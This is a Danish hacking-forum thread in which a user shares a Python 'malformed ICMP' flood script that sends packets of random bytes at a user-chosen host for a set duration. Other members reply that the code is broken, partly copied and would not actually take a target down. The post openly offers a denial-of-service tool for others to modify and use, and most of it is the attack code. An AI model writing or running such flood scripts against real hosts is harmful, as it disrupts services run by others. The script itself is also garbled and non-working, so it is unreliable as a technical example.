Shellsec

Fuld version: Gratis python flood script | Malformed ICMP
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.
Hej shellsec!
Jeg skrev et python flooding script som sender en masse malformed ICMP requests. Har ikke for alvor testet programmet. I velkommen til at modificere scriptet.



Kode:
import socket
import random
import time
import os

print(".######...####...##...##..##...##...####...##.....")
print("...##....##..##..###.###..###.###..##..##..##.....")
print("...##....##......##.#.##..##.#.##..######..##.....")
print("...##....##..##..##...##..##...##..##..##..##.....")
print(".######...####...##...##..##...##..##..##..######.")
print("..................................................")
print(".............Malformed ICMP - By KIWI.............")
print("")
target = raw_input("Host (URL or IP): ")
port = 80
print("======")
package = input("Packet Size: ")
print("======")
duration = input("Duration (Seconds): ")
print("======")
durclock = (lambda:0, time.clock)[duration > 0]
duration = (1, (durclock() + duration))[duration > 0]
packet = random._urandom(package)
count = 0
#--------------------------------------------------------------
icmp = socket.getprotobyname("icmp")
picmp = socket.getprotobyname("icmp")
mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)

myID = os.getpid() & 0x0800
#--------------------------------------------------------------
print("---")
print("An ICMP flood started on %s with %s bytes for %s seconds." % (target, package, duration))
while True:
        if (durclock() < duration):
            #-----------------------------------------------------------------------
               mySocket.connect((target, port))
               mySocket.sendto(packet, (target, port))
               count = count + 1
               print("[+ %s +] Sending malformed ICMP to %s on port %s" % (count, target, port))
            #-----------------------------------------------------------------------
        else:
                break
print("=============================================")
print("%s packets sent to %s for %s seconds." % (count, target, duration))

scriptet virker ikke på min hjemme-computer. Skriv venligst hvis det ikke virker for dig.

// Kiwi
packet = random._urandom(package)

???

så med " Malformed ICMP " mener du random data på port 80 ?
(24-11-2015, 20:21)dagGi Skrev: [ -> ]packet = random._urandom(package)

???

så med " Malformed ICMP " mener du random data på port 80 ?

Det er bare payload.


Kode:
icmp = socket.getprotobyname("icmp")
picmp = socket.getprotobyname("icmp")
mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)

myID = os.getpid() & 0x0800
Jeg er godt nok ikke Python udvikler, men det ser ud til at være v3.x, er det rigtigt?

Hvad bruger du følgende til? Det ser ikke ud til, de bliver brugt?
picmp = socket.getprotobyname("icmp")
myID = os.getpid() & 0x0800

Hvis jeg var dig, ville jeg nok fjerne "print("[+ %s +] Sending malformed ICMP to %s on port %s" % (count, target, port))" fra din løkke.
Det må danne en hel den output. Sætter det ikke farten ret meget ned? Jeg tænker at med ICMP, må hastigheden jo betyde en del. :)

Det er nok bare mig der ikke kender Python, men det undrer mig nemlig lidt, det skulle være nødvendigt at lave en connect, for at bruge ICMP. Det er jo ikke statefull og bruger ikke portnumre men typer og koder.
Det ville være rigtig fedt, hvis du ville smide nogle kommentarer i koden, så os dødelige kan se hvordan det virker. :)
Fortæl fortæl. :D
(24-11-2015, 23:24)idkfa Skrev: [ -> ]Det er helt ubrugeligt det script der, og han har fundet det her og bare indsat en masse comments, print statements og kode der ikke gør noget: http://ideone.com/0e5WOi

Det spammer bare random UDP data til port 80, det vil ikke DoS'e noget som helst det der.

Jeg kan godt se der ikke er meget dos over det script her, men forfa'n vi skal jo allesammen starte et sted...
Bær over med Kiwi, og lad os se om det næste han kommer med ikke er guld værd ;)